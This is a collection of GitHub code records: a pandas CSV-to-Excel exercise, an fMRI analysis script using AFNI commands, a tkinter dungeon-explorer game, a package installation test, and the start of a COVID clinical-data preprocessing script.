с файлом этими данными - ,\nне нужен.\n\"\"\"\nimport pandas as pd\nimport openpyxl\n\ndf = pd.read_csv('task_4.csv')\ndroped_df = df.drop(columns=['Age'], axis=1)\ndf_adding_columns = droped_df.set_axis((['Person {}'.format(i) for i in range(1, len(droped_df) + 1)])).transpose()\nprint(df_adding_columns)\ndf_adding_columns.to_excel('task_5.xlsx')\n","repo_name":"tms-course/py-2022","sub_path":"maks_yakuta/lesson_6/task_5.py","file_name":"task_5.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"38173827016","text":"\nimport os\nimport itertools\nimport logging\n\nimport numpy as np\n\nimport fmri_tools.analysis\nimport fmri_tools.utils\n\nimport ul_sens_analysis.config\nimport ul_sens_fmri.config\nimport runcmd\n\n\ndef run(subj_id, acq_date):\n\n conf = ul_sens_fmri.config.get_conf()\n conf.ana = ul_sens_analysis.config.get_conf()\n\n inf_str = subj_id + \"_ul_sens_\" + acq_date\n\n subj_dir = os.path.join(conf.ana.base_subj_dir, subj_id)\n\n glm_dir = os.path.join(subj_dir, conf.ana.glm_dir)\n\n log_dir = os.path.join(subj_dir, \"logs\")\n log_path = os.path.join(\n log_dir,\n \"{s:s}-glm_prep-log.txt\".format(s=inf_str)\n )\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n fmri_tools.utils.set_logger(\"screen\")\n fmri_tools.utils.set_logger(log_path)\n\n os.chdir(glm_dir)\n\n # convert the localiser GLM to masks in V1, V2, and V3\n mask_paths = _loc_to_mask(subj_id, acq_date, conf)\n\n _extract_data(subj_id, acq_date, conf, mask_paths)\n\n\ndef _loc_to_mask(subj_id, acq_date, conf):\n\n subj_dir = os.path.join(conf.ana.base_subj_dir, subj_id)\n\n loc_glm_dir = os.path.join(subj_dir, conf.ana.loc_glm_dir)\n\n os.chdir(loc_glm_dir)\n\n inf_str = subj_id + \"_ul_sens_\" + acq_date\n\n mask_paths = {}\n\n # go through combinations of visual field position and hemisphere\n for (vf, hemi) in itertools.product((\"upper\", \"lower\"), (\"lh\", \"rh\")):\n\n # this is the localiser GLM subbrick with the t-statistic for this\n # visual field location\n loc_t_path = \"{s:s}-loc_{v:s}-glm-{h:s}_nf.niml.dset\".format(\n s=inf_str, v=vf, h=hemi\n ) + \"[\" + conf.ana.loc_glm_brick + \"]\"\n\n # check it is correct\n assert fmri_tools.utils.get_dset_label(loc_t_path)[0] == vf + \"#0_Tstat\"\n\n # subject's ROI definitions for this hemisphere\n roi_path = os.path.join(\n conf.ana.roi_dir,\n subj_id,\n \"rois\",\n \"{s:s}_vis_loc_--rois-{h:s}_nf.niml.dset\".format(\n s=subj_id, h=hemi\n )\n )\n\n # this is the mask file to write\n mask_path = \"{s:s}-loc_{v:s}-mask-{h:s}_nf.niml.dset\".format(\n s=inf_str, v=vf, h=hemi\n )\n\n # we want the roi file to be 'amongst' the identifiers for V1-V3\n roi_test = \"amongst(a,\" + \",\".join(conf.ana.roi_numbers) + \")\"\n\n # we also want the t-value to be above a certain threshold\n loc_test = \"step(b-\" + conf.ana.loc_glm_thresh + \")\"\n\n # so it is an 'and' operation, and we want it to be labelled with the\n # ROI identified value so we multiply it by the outcome\n expr = \"'a*and(\" + roi_test + \",\" + loc_test + \")'\"\n\n cmd = [\n \"3dcalc\",\n \"-overwrite\",\n \"-a\", roi_path,\n \"-b\", loc_t_path,\n \"-expr\", expr,\n \"-prefix\", mask_path\n ]\n\n runcmd.run_cmd(\" \".join(cmd))\n\n # store the mask path to make it easier to access in the next step\n mask_paths[(vf, hemi)] = mask_path\n\n return mask_paths\n\n\ndef _extract_data(subj_id, acq_date, conf, mask_paths, loc_mask=True):\n\n inf_str = subj_id + \"_ul_sens_\" + 
acq_date\n\n subj_dir = os.path.join(conf.ana.base_subj_dir, subj_id)\n\n if loc_mask:\n mask_dir = os.path.join(subj_dir, \"loc_analysis\")\n analysis_dir = os.path.join(subj_dir, \"analysis\")\n else:\n mask_dir = os.path.join(subj_dir, \"post_analysis\", \"ret_roi\")\n analysis_dir = mask_dir\n\n n_rois = len(conf.ana.roi_names)\n n_vols_per_run = int(conf.exp.run_len_s / conf.ana.tr_s)\n\n # initialise our data container; rois x runs x volumes x vf\n data = np.empty(\n (\n n_rois,\n conf.exp.n_runs,\n n_vols_per_run,\n 2\n )\n )\n data.fill(np.NAN)\n\n for (i_vf, vf) in enumerate((\"upper\", \"lower\")):\n\n for run_num in range(1, conf.exp.n_runs + 1):\n\n run_dir = os.path.join(\n subj_dir,\n \"func\",\n \"run_{n:02d}\".format(n=run_num)\n )\n\n os.chdir(run_dir)\n\n # note that the last index here is hemisphere\n hemi_data = np.empty((n_rois, n_vols_per_run, 2))\n hemi_data.fill(np.NAN)\n\n for (i_hemi, hemi) in enumerate((\"lh\", \"rh\")):\n\n run_path = \"{s:s}-run_{n:02d}-uw-{h:s}_nf.niml.dset\".format(\n s=inf_str, n=run_num, h=hemi\n )\n\n # average across all nodes in each ROI and dump the timecourse\n # to standard out\n cmd = [\n \"3dROIstats\",\n \"-mask\", os.path.join(mask_dir, mask_paths[(vf, hemi)]),\n \"-1Dformat\",\n run_path\n ]\n\n # ... which we don't want to log!\n cmd_out = runcmd.run_cmd(\" \".join(cmd), log_stdout=False)\n\n # check the header for correctness\n roi_header = cmd_out.std_out.splitlines()[1].split(\"\\t\")[-3:]\n\n # make sure that the columns are what I think they are\n for (roi_head, roi_index) in zip(\n roi_header,\n conf.ana.roi_numbers\n ):\n assert roi_head.strip() == \"Mean_\" + roi_index\n\n # we want to clip out the header and the info lines\n run_data = cmd_out.std_out.splitlines()[3::2]\n\n # check we've done this correctly\n assert len(run_data) == n_vols_per_run\n\n for (i_vol, vol_data) in enumerate(run_data):\n\n # so this is just one line of data, tab-separated\n # we want to pull out our three ROIs, which will be the\n # last in the file\n vol_data = vol_data.split(\"\\t\")[-n_rois:]\n\n # store, for each of the ROIs\n hemi_data[:, i_vol, i_hemi] = vol_data\n\n # check that we've filled up the array as expected\n assert np.sum(np.isnan(hemi_data)) == 0\n\n # average over hemispheres\n hemi_data = np.mean(hemi_data, axis=-1)\n\n if loc_mask:\n mask_descrip = \"_\"\n else:\n mask_descrip = \"_ret_roi_\"\n\n run_path = \"{s:s}-run_{n:02d}-uw-{vf:s}{m:s}data.txt\".format(\n s=inf_str, n=run_num, vf=vf, m=mask_descrip\n )\n\n # save it out as a text file for this run; rois x vols\n np.savetxt(run_path, hemi_data)\n\n # we also want to save what 'nodes' in this data corresponds to; ie\n # ROI identifiers\n run_nodes_path = \"{s:s}-run_{n:02d}-uw-{vf:s}{m:s}nodes.txt\".format(\n s=inf_str, n=run_num, vf=vf, m=mask_descrip\n )\n\n np.savetxt(run_nodes_path, map(int, conf.ana.roi_numbers), \"%d\")\n\n # now we want to make it into an AFNI dataset so we can run the GLM\n # using their software\n run_path_niml = \"{s:s}-run_{n:02d}-uw-{v:s}{m:s}data.niml.dset\".format(\n s=inf_str, n=run_num, v=vf, m=mask_descrip\n )\n\n cmd = [\n \"ConvertDset\",\n \"-i_1D\",\n \"-input\", run_path,\n \"-node_index_1D\", run_nodes_path,\n \"-o_niml\",\n \"-prefix\", run_path_niml,\n \"-overwrite\"\n ]\n\n runcmd.run_cmd(\" \".join(cmd))\n\n data[:, run_num - 1, :, i_vf] = hemi_data\n\n assert np.sum(np.isnan(data)) == 0\n\n os.chdir(analysis_dir)\n\n data_path = \"{s:s}-{m:s}data.npy\".format(s=inf_str, m=mask_descrip)\n\n # we save the data here so we can 
access it independent of AFNI\n np.save(data_path, data)\n","repo_name":"mannion-lab/ul_sens_fmri_analysis","sub_path":"ul_sens_analysis/glm_prep.py","file_name":"glm_prep.py","file_ext":"py","file_size_in_byte":7795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74597181050","text":"from cmu_112_graphics import *\nfrom enemy_class import *\nfrom map import *\nfrom a_star import *\nfrom treasure_class import *\nfrom music import *\n\nimport math, random\n\n##########################################\n# Splash Screen Mode\n##########################################\n\ndef splashScreenMode_redrawAll(app, canvas):\n canvas.create_text(app.width/2, app.height/4, text='Welcome to',\n font='Rockwell 70', fill='purple')\n canvas.create_text(app.width/2, app.height/4 + 90, text='Dungeon Explorer!',\n font='Rockwell 70', fill='purple')\n canvas.create_text(app.width/2, app.height * 3/5, text='Press any key to enter the game!',\n font='Rockwell 30', fill='black')\n\ndef splashScreenMode_keyPressed(app, event):\n app.music.unpause()\n app.mode = 'gameMode'\n\n##########################################\n# Game Mode\n##########################################\n\ndef gameMode_redrawAll(app, canvas):\n #draws game map\n for row in range(app.startRow, app.startRow + app.cellsInView):\n for col in range(app.startCol, app.startCol + app.cellsInView):\n (x0, y0, x1, y1) = getCellBounds(app, row-app.startRow, col-app.startCol)\n if (enemyMap[row][col] == 0):\n fill = \"black\"\n else:\n fill = \"white\"\n canvas.create_rectangle(x0, y0, x1, y1, fill=fill)\n\n #shows the bullet when it's being shot\n if (app.shooting == True):\n canvas.create_image(app.shotX, app.shotY,\n image = getCachedPhotoImage(app, app.bulletSprite))\n #draws player\n playCellY, playCellX = getCell(app, app.playerX, app.playerY)\n if (playCellY in range(app.startRow, app.startRow + app.cellsInView) and\n playCellX in range(app.startCol, app.startCol + app.cellsInView)):\n canvas.create_image(app.playerX, app.playerY,\n image = getCachedPhotoImage(app, app.playerSprite))\n\n #draws treasure\n for treas in app.treasure:\n if (treas.treasureUp == True and \n treas.treasCellY in range(app.startRow, app.startRow + app.cellsInView) and\n treas.treasCellX in range(app.startCol, app.startCol + app.cellsInView)):\n canvas.create_image(treas.treasPosX, treas.treasPosY,\n image = getCachedPhotoImage(app, app.treasureSprite))\n\n #draws enemy\n for enem in app.enemies:\n if (enem.enemyAlive == True and \n enem.enemyCellY in range(app.startRow, app.startRow + app.cellsInView) and\n enem.enemyCellX in range(app.startCol, app.startCol + app.cellsInView)):\n canvas.create_image(enem.enemyPosX, enem.enemyPosY,\n image = getCachedPhotoImage(app, app.enemySprite))\n #displays how much treasure + lives are left\n canvas.create_text(15, 25, text = f\"Treasure Collected: {app.treasureFound}\",\n fill = '#ff0037', anchor = W, font = ('Rockwell', '20'))\n if app.treasureHintsOn == True:\n canvas.create_text(233, 25, text = f\"/{app.totalTreasure}\",\n fill = '#ff0037', anchor = W, font = ('Rockwell', '20')) \n canvas.create_text(15, 50, text = f\"Lives: {app.hp}\",\n fill = '#ff0037', anchor = W, font = ('Rockwell', '20'))\n \n #game over screen\n if app.gameOver == True:\n canvas.create_rectangle((app.width/2)-150, (app.height/2)-80,\n (app.width/2)+150, (app.height/2)+10, fill = \"white\",\n width = 5)\n canvas.create_rectangle((app.width/2)-140, (app.height/2)+30,\n (app.width/2)+140, 
(app.height/2)+70, fill = \"white\",\n width = 5)\n canvas.create_text(app.width/2, (app.height/2)-30, text = \"You Win!\",\n font = ('Rockwell', '40'), anchor = \"center\")\n canvas.create_text(app.width/2, (app.height/2)+50,\n text = \"Press 'R' to play again!\", font = ('Rockwell', '20'))\n #pause menu\n elif app.paused == True:\n font = 'Rockwell 20'\n canvas.create_rectangle((app.width/2)-150, (app.height/4)-60,\n (app.width/2)+150, (app.height/4)+40, fill = \"white\",\n width = 5)\n canvas.create_rectangle((app.width/2)-300, (app.height/2)-100,\n (app.width/2)+300, (app.height/2)+200, fill = \"white\",\n width = 5)\n canvas.create_rectangle(210, 305, 235, 330, fill = \"white\",\n width = 5)\n canvas.create_rectangle(335, 345, 360, 370, fill = \"white\",\n width = 5)\n if app.music.isPlaying():\n canvas.create_rectangle(218, 313, 227, 322, fill = \"black\",\n width = 5)\n if app.treasureHintsOn == True:\n canvas.create_rectangle(343, 353, 352, 362, fill = \"black\",\n width = 5)\n canvas.create_text(app.width/2, (app.height/4)-10, text = \"Game Paused\",\n font = ('Rockwell 30'))\n canvas.create_text((app.width/2)-270, (app.height/2)-55, text = \"Music\",\n font = ('Rockwell 30'), anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)-15, text = \"Treasure Hints\",\n font = ('Rockwell 30'), anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+25, text = \"Instructions:\",\n font = ('Rockwell 30'), anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+60,\n text = \"Left click to move\", font = font, anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+90,\n text = \"Press Q to shoot enemies\", font = font, anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+120,\n text = \"Press E to blink to cursor position\",\n font = font, anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+150,\n text = \"Use WASD to adjust window\", font = font, anchor = W)\n canvas.create_text((app.width/2)-270, (app.height/2)+180,\n text = \"Avoid getting hit and collect all the treasure to win!\",\n font = font, anchor = W)\n\ndef gameMode_mousePressed(app, event):\n if app.paused == True and app.gameOver == False:\n #button for turning music on/off\n if (210 < event.x < 235 and 305 < event.y < 330):\n if (app.music.isPlaying()):\n app.music.pause()\n else:\n app.music.unpause()\n #button for turning hints on/off\n elif (335 < event.x < 360 and 345 < event.y < 370):\n if (app.treasureHintsOn == True):\n app.treasureHintsOn = False\n else:\n app.treasureHintsOn = True\n #moves the player towards where the mouse is pressed\n elif (event.x != app.playerX or event.y != app.playerY):\n app.moving = True\n app.destinationX = event.x\n app.destinationY = event.y\n\ndef gameMode_keyPressed(app, event):\n #CITATION: tkinter keys + other syntax from https://anzeljg.github.io/rin2/book2/2405/docs/tkinter/index.html\n #pauses game when p is pressed + unpauses when pressed again\n if app.gameOver == True:\n if event.key == 'r':\n appStarted(app, 'gameMode')\n else:\n return\n \n #to pause game\n if event.key == 'p':\n if app.paused == False:\n app.paused = True\n else:\n app.paused = False\n if app.paused == True:\n return\n \n #shoots an attack when q is pressed\n if event.key == 'q':\n if(app.shotX == app.aimedX and app.shotY == app.aimedY):\n return\n if app.shooting == False:\n app.shooting = True\n app.aimedX = app.mouseX\n app.aimedY = app.mouseY\n \n #blink to mouse position when e is pressed\n elif (event.key == 'e' and 
app.eOnCooldown == False):\n leftCellY, leftCellX = getCell(app, app.mouseX-40, app.mouseY)\n rightCellY, rightCellX = getCell(app, app.mouseX+40, app.mouseY)\n topCellY, topCellX = getCell(app, app.mouseX, app.mouseY-28)\n botCellY, botCellX = getCell(app, app.mouseX, app.mouseY+28)\n if (gameMap[leftCellY][leftCellX] == 1 and gameMap[rightCellY][rightCellX] == 1 and\n gameMap[topCellY][topCellX] == 1 and gameMap[botCellY][botCellX] == 1):\n d = ((app.playerX - app.mouseX)**2 + (app.playerY - app.mouseY)**2)**0.5\n dY = (app.playerY - app.mouseY)/d\n dX = (app.playerX - app.mouseX)/d\n #limits blink distance to 300 pixels away\n if d > 300:\n app.playerY -= (dY*300)\n app.playerX -= (dX*300)\n else:\n app.playerX = app.mouseX\n app.playerY = app.mouseY\n #stops player movement after blink and puts it on cooldown\n app.moving = False\n app.eOnCooldown = True\n \n #adjusts the view window using wasd keys\n if event.key == 's':\n if app.startRow + app.cellsInView < app.rows:\n app.startRow += 1\n app.playerY -= app.height/app.cellsInView\n for enem in app.enemies:\n if (enem.enemyPosY != None):\n enem.enemyPosY -= app.height/app.cellsInView\n for treas in app.treasure:\n treas.treasPosY -= app.height/app.cellsInView\n if (app.destinationX != None):\n app.destinationY -= app.height/app.cellsInView\n elif event.key == 'w':\n if app.startRow - 1 >= 0:\n app.startRow -=1\n app.playerY += app.height/app.cellsInView\n for enem in app.enemies:\n if (enem.enemyPosY != None):\n enem.enemyPosY += app.height/app.cellsInView\n for treas in app.treasure:\n treas.treasPosY += app.height/app.cellsInView\n if (app.destinationY != None):\n app.destinationY += app.height/app.cellsInView\n elif event.key == 'd':\n if app.startCol + app.cellsInView < app.cols:\n app.startCol += 1\n app.playerX -= app.width/app.cellsInView\n for enem in app.enemies:\n if (enem.enemyPosX != None):\n enem.enemyPosX -= app.width/app.cellsInView\n for treas in app.treasure:\n treas.treasPosX -= app.width/app.cellsInView\n if (app.destinationX != None):\n app.destinationX -= app.height/app.cellsInView\n elif event.key == 'a':\n if app.startCol - 1 >= 0:\n app.startCol -= 1\n app.playerX += app.width/app.cellsInView\n for enem in app.enemies:\n if (enem.enemyPosX != None):\n enem.enemyPosX += app.width/app.cellsInView\n for treas in app.treasure:\n treas.treasPosX += app.width/app.cellsInView\n if (app.destinationX != None):\n app.destinationX += app.height/app.cellsInView\n\ndef gameMode_mouseMoved(app, event):\n #gets mouse's current position\n app.mouseX = event.x\n app.mouseY = event.y\n\ndef gameMode_timerFired(app):\n #pauses game\n if app.paused == True:\n return\n\n #restarts the game when your hp reaches 0\n if app.hp == 0:\n appStarted(app, 'gameMode')\n\n #game is over when you have found all the treasure\n if app.treasureFound == app.totalTreasure:\n app.gameOver = True\n app.paused = True\n\n #controls player movement\n if(app.playerX == app.destinationX and app.playerY == app.destinationY):\n app.moving = False\n #has player move slowly towards where the mouse has clicked\n elif(app.moving == True):\n dist1 = ((app.playerX - app.destinationX)**2 +\n (app.playerY - app.destinationY)**2)**0.5\n dY1 = (app.playerY - app.destinationY)/dist1\n dX1 = (app.playerX - app.destinationX)/dist1\n if dist1 > 10:\n tempX = app.playerX\n tempY = app.playerY\n app.playerX -= 15*dX1\n app.playerY -= 15*dY1\n leftCellY, leftCellX = getCell(app, app.playerX-40, app.playerY)\n rightCellY, rightCellX = getCell(app, app.playerX+40, 
app.playerY)\n topCellY, topCellX = getCell(app, app.playerX, app.playerY-28)\n botCellY, botCellX = getCell(app, app.playerX, app.playerY+28)\n if (gameMap[leftCellY][leftCellX] == 0 or gameMap[rightCellY][rightCellX] == 0 or\n gameMap[topCellY][topCellX] == 0 or gameMap[botCellY][botCellX] == 0):\n app.playerX = tempX\n app.playerY = tempY\n else:\n app.playerX = app.destinationX\n app.playerY = app.destinationY\n\n #treasure collecting\n for treas in app.treasure:\n if(treas.treasureUp == True and \n treas.treasPosX - 50 <= app.playerX <= treas.treasPosX + 50 and\n treas.treasPosY - 50 <= app.playerY <= treas.treasPosY + 50):\n treas.treasureUp = False\n app.treasureFound += 1\n\n #controls bullet movement\n #keeps bullet starting point where the player is\n if (app.shooting == False):\n app.shotX, app.shotY = app.playerX, app.playerY\n #resets the bullet after it has reached its destination\n elif(app.shotX == app.aimedX and app.shotY == app.aimedY):\n app.shooting = False\n elif (app.shooting == True):\n dist2 = ((app.shotX - app.aimedX)**2 + (app.shotY - app.aimedY)**2)**0.5\n dY2 = (app.shotY - app.aimedY)/dist2\n dX2 = (app.shotX - app.aimedX)/dist2\n #limits the range of the bullet to 300 pixels\n if dist2 > 300:\n app.aimedY = app.shotY - (dY2*300)\n app.aimedX = app.shotX - (dX2*300)\n #bullet gradually travels to destination\n if dist2 > 70:\n app.shotX -= 70*dX2\n app.shotY -= 70*dY2\n #snaps to destination if it is less than 70 pixels away\n else:\n app.shotX = app.aimedX\n app.shotY = app.aimedY\n\n for enem in app.enemies:\n if(enem.enemyAlive == True):\n #if enemy hits player player loses 1 hp\n if(enem.enemyPosX - 70 <= app.playerX <= enem.enemyPosX + 70 and\n enem.enemyPosY - 70 <= app.playerY <= enem.enemyPosY + 70):\n enem.enemyAlive = False\n enem.enemyPosX = enem.enemyPosY = None\n app.hp -= 1\n #if bullet hits enemy, the enemy dies\n elif(enem.enemyPosX - 40 <= app.shotX <= enem.enemyPosX + 40 and\n enem.enemyPosY - 40 <= app.shotY <= enem.enemyPosY + 40):\n app.shooting = False\n enem.enemyAlive = False\n enem.enemyPosX = enem.enemyPosY = None\n \n #controls enemy movement through pathfinding\n for enem in app.enemies:\n if (enem.enemyAlive == True and \n enem.enemyCellY in range(app.startRow, app.startRow + app.cellsInView) and\n enem.enemyCellX in range(app.startCol, app.startCol + app.cellsInView)):\n playCellY, playCellX = getCell(app, app.playerX, app.playerY)\n if (playCellY in range(app.startRow, app.startRow + app.cellsInView) and\n playCellX in range(app.startCol, app.startCol + app.cellsInView)):\n path = a_star(gameMap, app.startCol, app.startRow, app.cellsInView, enem.enemyCellX,\n enem.enemyCellY, playCellX, playCellY)\n if((enem.enemyCellY != playCellY or enem.enemyCellX != playCellX) and path != None):\n x0, y0, x1, y1 = getCellBounds(app, path[1][0]-app.startRow,\n path[1][1]-app.startCol)\n enem.move(app.playerX, app.playerY, app.width/(app.cellsInView*2),\n x0, y0, x1, y1)\n enem.enemyCellY, enem.enemyCellX = getCell(app, enem.enemyPosX, enem.enemyPosY)\n path.pop(0)\n #makes it so that enemies keep chasing even if they're in the same cell as the player\n elif((enem.enemyPosY != playCellY or enem.enemyPosX != playCellX) and path != None):\n enem.move(app.playerX, app.playerY, app.width, None, None, None, None)\n\n #monitors blink cooldown\n if (app.eOnCooldown == True):\n app.eCooldown -= app.timerDelay\n if (app.eCooldown == 0):\n app.eCooldown = 5000\n app.eOnCooldown = False\n\n #respawns enemy at their original location after being dead for a 
certain \n #amount of time\n for enem in app.enemies:\n if enem.enemyAlive == False:\n enem.respawnTime -= app.timerDelay\n if (enem.respawnTime == 0):\n enem.respawnTime = 10000\n enem.enemyAlive = True\n enem.enemyCellX, enem.enemyCellY = enem.originX, enem.originY\n (x0, y0, x1, y1) = getCellBounds(app, enem.enemyCellY-app.startRow,\n enem.enemyCellX-app.startCol)\n enem.enemyPosX = (x0 + x1)/2\n enem.enemyPosY = (y0 + y1)/2\n\n##########################################\n# Main App\n##########################################\n\ndef appStarted(app, mode = 'splashScreenMode'):\n app.mode = mode\n app.timerDelay = 100\n app.paused = False\n app.gameOver = False\n app.treasureHintsOn = False\n #CITATION: music from the game Helltaker (link: https://www.youtube.com/watch?v=GzeBHIto4Ps)\n pygame.mixer.init()\n app.music = Music(\"Helltaker OST.mp3\")\n app.music.start()\n if app.mode == 'splashScreenMode':\n app.music.pause()\n #map/window attributes\n app.rows = len(gameMap)\n app.cols = len(gameMap[0])\n app.startRow = 12\n app.startCol = 12\n app.cellsInView = 7\n #player attributes\n app.playerX = 440\n app.playerY = 440\n app.moving = False\n app.shooting = False\n app.destinationX = None\n app.destinationY = None\n app.eOnCooldown = False\n app.eCooldown = 5000\n app.treasureFound = 0\n app.totalTreasure = 10\n app.hp = 5\n #bullet attributes\n app.shotR = 10\n app.shotX = None\n app.shotY = None\n app.aimedX = None\n app.aimedY = None\n #mouse attributes\n app.mouseX = 0\n app.mouseY = 0\n #sprites (drawn by myself)\n app.sprites = app.loadImage('slime sprites.png')\n app.playerSprite = app.sprites.crop((60, 25, 140, 81))\n app.bulletSprite = app.sprites.crop((200, 25, 250, 70))\n app.enemySprite = app.sprites.crop((62, 105, 145, 180))\n app.treasureSprite = app.sprites.crop((180, 90, 260, 170))\n #enemy attributes\n app.enemies = []\n for row in range(app.rows):\n for col in range(app.cols):\n if enemyMap[row][col] == 2:\n app.enemies += [Enemy(col, row)]\n for enem in app.enemies:\n (x0, y0, x1, y1) = getCellBounds(app, enem.enemyCellY-app.startRow,\n enem.enemyCellX-app.startCol)\n enem.enemyPosX = (x0 + x1)/2\n enem.enemyPosY = (y0 + y1)/2\n #treasure attributes\n app.treasure = []\n for row in range(app.rows):\n for col in range(app.cols):\n if treasMap[row][col] == 3:\n app.treasure += [Treasure(col, row)]\n for treas in app.treasure:\n (x0, y0, x1, y1) = getCellBounds(app, treas.treasCellY-app.startRow,\n treas.treasCellX-app.startCol)\n treas.treasPosX = (x0 + x1)/2\n treas.treasPosY = (y0 + y1)/2\n\n#CITATION: function from 15-112 images mini-lecture\ndef getCachedPhotoImage(app, image):\n #stores a cached photo\n if ('cachedPhotoImage' not in image.__dict__):\n image.cachedPhotoImage = ImageTk.PhotoImage(image)\n return image.cachedPhotoImage\n\ndef pointInGrid(app, x, y):\n return ((0 <= x <= app.width) and (0 <= y <= app.height))\n\n#CITATION: grid tkinter code from https://www.cs.cmu.edu/~112/notes/notes-animations-part2.html\ndef getCellBounds(app, row, col):\n gridWidth = app.width\n gridHeight = app.height\n cellWidth = gridWidth / app.cellsInView\n cellHeight = gridHeight / app.cellsInView\n x0 = col * cellWidth\n x1 = (col+1) * cellWidth\n y0 = row * cellHeight\n y1 = (row+1) * cellHeight\n return (x0, y0, x1, y1)\n\ndef getCell(app, x, y):\n #if (not pointInGrid(app, x, y)):\n # return (-1, -1)\n gridWidth = app.width\n gridHeight = app.height\n cellWidth = gridWidth / app.cellsInView\n cellHeight = gridHeight / app.cellsInView\n\n row = int(y / cellHeight) + 
app.startRow\n col = int(x / cellWidth) + app.startCol\n\n return (row, col)\n\ndef main():\n runApp(width=750, height=750)\n\nif __name__ == '__main__':\n main()","repo_name":"yiyunwei/15112tp","sub_path":"code/main_game.py","file_name":"main_game.py","file_ext":"py","file_size_in_byte":21155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5809449849","text":"import sys\nimport os\nimport pandas as pd\nimport tables\nimport h5py\nimport numpy as np\nimport cv2\n\nfrom PyQt5.QtWidgets import QApplication, QWidget\n\nimport matplotlib\nmatplotlib.use(\"Qt5Agg\")\nimport matplotlib.pylab as plt\n\nimport tierpsy\nimport open_worm_analysis_toolbox\n\nif __name__ == '__main__':\n print(r\"%%%%%%% INSTALLATION TESTS %%%%%%%%\")\n print('python:', sys.executable)\n\n print(np.__name__, np.__version__)\n a = np.arange(10)\n print('test:', a)\n\n print(plt.__name__, plt.__version__)\n\n print(cv2.__name__, cv2.__version__)\n\n print(h5py.__name__, h5py.__version__)\n inputFiles = \"test.h5\"\n with h5py.File(inputFiles, 'w') as inputFileOpen:\n print('good h5py')\n\n print(tables.__name__, tables.__version__)\n with tables.File(inputFiles, 'w') as inputFileOpen:\n print('good tables')\n\n os.remove(inputFiles)\n\n print(pd.__name__, pd.__version__)\n\n print(tierpsy.__name__, tierpsy.__version__)\n print(open_worm_analysis_toolbox.__name__, open_worm_analysis_toolbox.__version__)\n\n if False:\n app = QApplication(sys.argv)\n w = QWidget()\n w.resize(250, 150)\n w.move(300, 300)\n w.setWindowTitle('Simple')\n w.show()\n sys.exit(app.exec_())\n","repo_name":"ver228/tierpsy-tracker","sub_path":"_old/installation/installation_test.py","file_name":"installation_test.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"78"} +{"seq_id":"36541553913","text":"import numpy as np\nimport pandas as pd\nimport datetime\n\n# explicitly require this experimental feature\nfrom sklearn.experimental import enable_iterative_imputer # noqa\nfrom sklearn.impute import IterativeImputer, KNNImputer\n\nfrom analyzer.utils import remove_missing\n\nRENAMED_ADMISSION_COLUMNS = {\n 'EDAD/AGE':'Age','SEXO/SEX':'Gender',\n 'DIAG ING/INPAT':'DIAG_TYPE',\n 'MOTIVO_ALTA/DESTINY_DISCHARGE_ING':'Outcome',\n 'F_INGRESO/ADMISSION_D_ING/INPAT':'Date_Admission',\n 'F_INGRESO/ADMISSION_DATE_URG/EMERG':'Date_Emergency',\n 'TEMP_PRIMERA/FIRST_URG/EMERG':'Body Temperature',\n 'FC/HR_PRIMERA/FIRST_URG/EMERG':'Cardiac Frequency',\n 'GLU_PRIMERA/FIRST_URG/EMERG':'Glycemia',\n 'SAT_02_PRIMERA/FIRST_URG/EMERG':'SaO2',\n 'TA_MAX_PRIMERA/FIRST/EMERG_URG':'Systolic Blood Pressure'}\n\nVITAL_COLUMNS ={\n 'PATIENT ID',\n 'Body Temperature',\n 'Cardiac Frequency',\n 'SaO2',\n 'Systolic Blood Pressure'\n }\n\nDEMOGRAPHICS_COLUMNS={'PATIENT ID','Gender','Age'}\n\nADMISSION_COLUMNS = ['PATIENT ID','Outcome','Date_Admission','Date_Emergency']\n\n\nRENAMED_LAB_MEASUREMENTS = {'BT -- BILIRRUBINA TOTAL ':'Total Bilirubin',\n 'GOT -- GOT (AST)':'Aspartate Aminotransferase (AST)',\n 'LEUC -- Leucocitos':'CBC: Leukocytes',\n 'HGB -- Hemoglobina':'CBC: Hemoglobin',\n 'VCM -- Volumen Corpuscular Medio':'CBC: Mean Corpuscular Volume (MCV)',\n 'GPT -- GPT (ALT)':'Alanine Aminotransferase (ALT)',\n 'NA -- SODIO':'Blood Sodium',\n 'LIN -- Linfocitos':'CBC: Lymphocytes',\n 'INR -- INR':'Prothrombin Time (INR)',\n 'K -- POTASIO':'Potassium Blood Level',\n 'COL -- COLESTEROL TOTAL':'Cholinesterase',\n 'SO2C -- sO2c 
(Saturación de oxígeno)':'ABG: Oxygen Saturation (SaO2)a',\n 'SO2CV -- sO2c (Saturación de oxígeno)':'ABG: Oxygen Saturation (SaO2)b',\n # '':'CBC: Red cell Distribution Width (RDW) '\n 'PLAQ -- Recuento de plaquetas':'CBC: Platelets',\n 'PCR -- PROTEINA C REACTIVA':'C-Reactive Protein (CRP)',\n 'U -- UREA':'Urea',\n 'CREA -- CREATININA':'Blood Creatinine',\n 'CA -- CALCIO ':'Blood Calcium',\n 'AMI -- AMILASA':'Blood Amylase',\n 'APTT -- TIEMPO DE CEFALINA (APTT':'Activated Partial Thromboplastin Time (aPTT)',\n 'HCO3 -- HCO3-':'ABG: standard bicarbonate (sHCO3)',\n 'PH -- pH':'ABG: pH',\n 'PO2 -- pO2':'ABG: PaO2',\n 'PCO2 -- pCO2':'ABG: PaCO2',\n # '':'ABG: MetHb',\n 'LAC -- LACTATO':'ABG: Lactic Acid',\n # '':'ABG: COHb',\n 'BE(b) -- BE(b)':'ABG: Base Excess',\n 'LEUORS -- Leucocitos':'CBC: Leukocytes4',\n 'DD -- DIMERO D':'D-Dimer',\n 'GLU -- GLUCOSA':'Glycemia'}\n\nLAB_METRICS = ['Total Bilirubin','Aspartate Aminotransferase (AST)',\n 